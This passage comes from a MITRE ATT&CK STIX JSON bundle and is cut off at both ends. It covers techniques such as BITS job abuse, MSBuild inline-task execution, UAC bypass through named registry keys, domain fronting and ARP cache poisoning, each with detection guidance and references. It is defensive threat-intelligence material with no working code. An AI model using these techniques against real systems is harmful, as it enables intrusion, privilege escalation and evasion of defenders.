"Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.", "url": "https://github.com/bontchev/pcodedmp"}, {"source_name": "oletools toolkit", "description": "decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.", "url": "https://github.com/decalage2/oletools"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "BITS Jobs", "description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Brent Murphy, Elastic", "David French, Elastic", "Ricardo Dias", "Red Canary"], "x_mitre_deprecated": false, "x_mitre_detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the \u2018Transfer\u2019, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Firewall", "Host forensic analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1197", "external_id": "T1197"}, {"source_name": "CTU BITS Malware June 2016", "description": "Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.", "url": "https://www.secureworks.com/blog/malware-lingers-with-bits"}, {"source_name": "Symantec BITS May 2007", "description": "Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.", "url": "https://www.symantec.com/connect/blogs/malware-update-windows-update"}, {"source_name": "Elastic - Hunting for Persistence Part 1", "description": "French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.", "url": "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1"}, {"source_name": "PaloAlto UBoatRAT Nov 2017", "description": "Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.", "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"}, {"source_name": "Microsoft Issues with BITS July 2011", "description": "Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.", "url": "https://technet.microsoft.com/library/dd939934.aspx"}, {"source_name": "Microsoft BITS", "description": "Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx"}, {"source_name": "Microsoft BITSAdmin", "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.", "url": "https://msdn.microsoft.com/library/aa362813.aspx"}, {"source_name": "Microsoft COM", "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx"}, {"source_name": "Mondok Windows PiggyBack BITS May 2007", "description": "Mondok, M. (2007, May 11). Malware piggybacks on Windows\u2019 Background Intelligent Transfer Service. Retrieved January 12, 2018.", "url": "https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-14T19:23:58.317Z", "name": "MSBuild", "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["@ionstorm", "Carrie Roberts, @OrOneEqualsOne"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_system_requirements": [".NET Framework version 4 or higher"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", "created": "2020-03-27T21:50:26.042Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1127/001", "external_id": "T1127.001"}, {"source_name": "LOLBAS Msbuild", "description": "LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"}, {"source_name": "Microsoft MSBuild Inline Tasks 2017", "description": "Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.", "url": "https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element"}, {"source_name": "MSDN MSBuild", "description": "Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.", "url": "https://msdn.microsoft.com/library/dd393574.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:10.962Z", "name": "Hardcoded Credentials", "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. \n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets. \n", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Aagam Shah, @neutrinoguy, ABB"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Logon Session: Logon Session Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", "created": "2022-09-29T13:35:38.589Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0891", "external_id": "T0891"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-30T19:45:05.886Z", "name": "Impersonation", "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary\u2019s ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary\u2019s goal.\u202f\u202f \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Pawel Partyka, Microsoft Threat Intelligence", "Blake Strom, Microsoft Threat Intelligence"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "created": "2023-08-08T15:42:18.906Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1656", "external_id": "T1656"}, {"source_name": "CrowdStrike-BEC", "description": "Bart Lenaerts-Bergmans. (2023, March 10). What is Business Email Compromise?. Retrieved August 8, 2023.", "url": "https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/"}, {"source_name": "VEC", "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.", "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-02T22:17:54.968Z", "name": "Modify Cloud Compute Configurations", "description": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim\u2019s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.\n\nFor example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim\u2019s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim\u2019s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Blake Strom, Microsoft Threat Intelligence", "Amir Gharib, Microsoft Threat Intelligence"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f", "created": "2023-09-05T14:19:17.486Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1578/005", "external_id": "T1578.005"}, {"source_name": "Microsoft Subscription Hijacking 2022", "description": "Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.", "url": "https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121"}, {"source_name": "Microsoft Cryptojacking 2023", "description": "Microsoft Threat Intelligence. (2023, July 25). Cryptojacking: Understanding and defending against cloud compute resource abuse. Retrieved September 5, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/"}, {"source_name": "Microsoft Peach Sandstorm 2023", "description": "Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/"}, {"source_name": "Microsoft Azure Policy", "description": "Microsoft. (2023, August 30). Azure Policy built-in policy definitions. Retrieved September 5, 2023.", "url": "https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Bypass User Account Control", "description": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Stefan Kanthak", "Casey Smith"], "x_mitre_detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key. (Citation: enigma0x3 Fileless UAC Bypass)\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys. (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Windows User Account Control"], "x_mitre_effective_permissions": ["Administrator"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "created": "2017-05-31T21:31:07.462Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1088", "external_id": "T1088"}, {"source_name": "TechNet How UAC Works", "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works"}, {"source_name": "TechNet Inside UAC", "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx"}, {"source_name": "MSDN COM Elevation", "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx"}, {"source_name": "Davidson Windows", "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html"}, {"source_name": "Github UACMe", "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", "url": "https://github.com/hfiref0x/UACME"}, {"source_name": "enigma0x3 Fileless UAC Bypass", "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"}, {"source_name": "Fortinet Fareit", "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware"}, {"source_name": "SANS UAC Bypass", "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass"}, {"source_name": "enigma0x3 sdclt app paths", "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/"}, {"source_name": "enigma0x3 sdclt bypass", "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Runtime Data Manipulation", "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_impact_type": ["Integrity"], "x_mitre_permissions_required": ["User", "Administrator", "root", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", "created": "2019-04-09T16:09:22.173Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1494", "external_id": "T1494"}, {"source_name": "FireEye APT38 Oct 2018", "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", "url": "https://content.fireeye.com/apt/rpt-apt38"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-03-30T21:01:52.356Z", "name": "Domain Fronting", "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Matt Kelly, @breakersall"], "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "created": "2020-03-14T23:29:19.581Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1090/004", "external_id": "T1090.004"}, {"source_name": "Fifield Blocking Resistent Communication through domain fronting 2015", "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.", "url": "http://www.icir.org/vern/papers/meek-PETS-2015.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "ARP Cache Poisoning", "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jon Sternstein, Stern Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "created": "2020-10-15T12:05:58.755Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": 